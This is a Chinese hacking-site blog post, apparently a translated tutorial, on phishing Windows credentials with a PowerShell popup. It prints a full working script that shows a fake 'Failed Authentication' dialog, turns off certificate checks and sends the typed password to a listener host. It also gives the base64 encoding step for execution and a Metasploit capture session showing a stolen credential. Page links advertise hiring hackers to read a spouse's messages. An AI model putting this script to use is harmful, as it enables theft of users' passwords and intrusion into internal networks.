Powershell基础认证钓鱼与捕获

访客4年前 (2020-09-12)黑客工具666

　　本文是metasploitminute的课程利用powershell生成一个基础认证钓鱼窗体，然后通过metasploit来capture捕获。

　　最酷的是不生成额外代码，可以获取任何级别用户的认证信息，无需管理员权限，无需过UAC，通过SSL方式只需要一些免费的证书。

　　渗透中不战而屈人之兵为上等，让管理员或者其他域用户拱手交出自己的密码当然是更好了。

　　 evilpopup_metasploit

　　视频教程在此：

　　powershell脚本代码：

　　$cred=$host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName + "" + [Environment]::UserName,[Environment]::UserDomainName);[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};

　　$wc=new-object net.webclient;

　　$wc.Headers.Add("User-Agent","Wget/1.9+cvs-stable (Red Hat modified)");

　　$wc.Proxy=[System.Net.WebRequest]::DefaultWebProxy;

　　$wc.Proxy.Credentials=[System.Net.CredentialCache]::DefaultNetworkCredentials;

　　$wc.credentials=new-object system.net.networkcredential($cred.username, $cred.getnetworkcredential().password, '');

　　$result=$wc.downloadstring('https://172.16.102.163');

　　分解一下：

　　$cred=$host.ui.promptforcredential('Failed Authentication','',[Environment]::UserName,[Environment]::UserDomainName);

　　这步告诉windows提示凭证,我们设置的标题是“Failed Authentication”（验证失败），在弹窗里面增加了用户名和域名来提过真实性。当然这一切，都只是辅助。

　　[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};

　　告诉powershell不要验证SSL证书(允许我们后续使用自签署的证书）

　　$wc=new-object net.webclient;

　　$wc.Headers.Add("User-Agent","Wget/1.9+cvs-stable (Red Hat modified)");

　　创建一个新的webclient对象并设置它的用户 *** 为Wget。

　　$wc.Proxy=[System.Net.WebRequest]::DefaultWebProxy;

　　$wc.Proxy.Credentials=[System.Net.CredentialCache]::DefaultNetworkCredentials;

　　告诉powershell使用当前用户可能在使用的任何 *** 及任何缓存的凭据。

　　$wc.credentials=new-object system.net.networkcredential($cred.username, $cred.getnetworkcredential().password, '');

　　用户在此基础认证钓鱼中输入的密码就是安全研究人员和黑客们想要的密码，对内网渗透十分有裨益。

　　$result=$wc.downloadstring('https://172.16.102.163');

　　最后发送请求到监听机器上监听机器上使用metasploit的capture模块

　　cat power.txt | iconv --to-code UTF-16LE | base64

　　base64一下上述代码

　　然后执行你就可以看到十分逼真的基础认证钓鱼窗口:

　　 2014-09-03-powershellpopup

　　另外一边使用metasploit接收密码：

　　root@wpad:~/metasploit-framework# https://www.secpulse.com/archives/msfconsole -Lq

　　msf > use auxiliary/server/capture/http_basic

　　msf auxiliary(http_basic) > show options

　　Module options (auxiliary/server/capture/http_basic):

　　Name Current Setting Required Description

　　---- --------------- -------- -----------

　　REALM Secure Site yes The authentication realm you'd like to present.

　　RedirectURL no The page to redirect users to after they enter basic auth creds

　　SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0

　　SRVPORT 80 yes The local port to listen on.

　　SSL false no Negotiate SSL for incoming connections

　　SSLCert no Path to a custom SSL certificate (default is randomly generated)

　　SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)

　　URIPATH no The URI to use for this exploit (default is random)

　　msf auxiliary(http_basic) > set SSL true

　　SSL=> true

　　msf auxiliary(http_basic) > set SRVPORT 443

　　SRVPORT=> 443

　　msf auxiliary(http_basic) > set URIPATH /

　　URIPATH=> /

　　msf auxiliary(http_basic) > run

　　[*] Auxiliary module execution completed

　　msf auxiliary(http_basic) >

　　[*] Listening on 0.0.0.0:443...

　　[*] Using URL: https://0.0.0.0:443/

　　[*] Local IP: https://172.16.102.163:443/

　　[*] Server started.

　　[*] 172.16.102.140 http_basic - Sending 401 to client 172.16.102.140

　　[+] 172.16.102.140 - Credential collected: "SITTINGDUCKASDqwe123"=> /

　　【原文：Powershell Popups + Capture SP小编翻译发布】

标签: Powershell基础认证钓鱼与捕获

返回列表

上一篇：【HTB系列】靶机Netmon的渗透测试

下一篇：SEO电子书下载（全套SEO教程电子书PDF）

找黑客平台

Powershell基础认证钓鱼与捕获

相关文章

黑客如何找,黑客微信超过两分钟怎么撤回,黑客模拟器游戏手机版

传说烤串坊烧烤加盟有前景吗？前途一片光明

唐香村烤鱼坊加盟条件都有什么?一起来看看

找黑客帮开车多少钱-高仿黑客入侵模拟器苹果版(高仿黑客入侵模拟器安卓版)

智能空调黑客（黑科技空调）

找黑客查看老婆的微信记录,黑客收徒网站建设

Copyright Your WebSite.Some Rights Reserved.

Hacker by Hacker.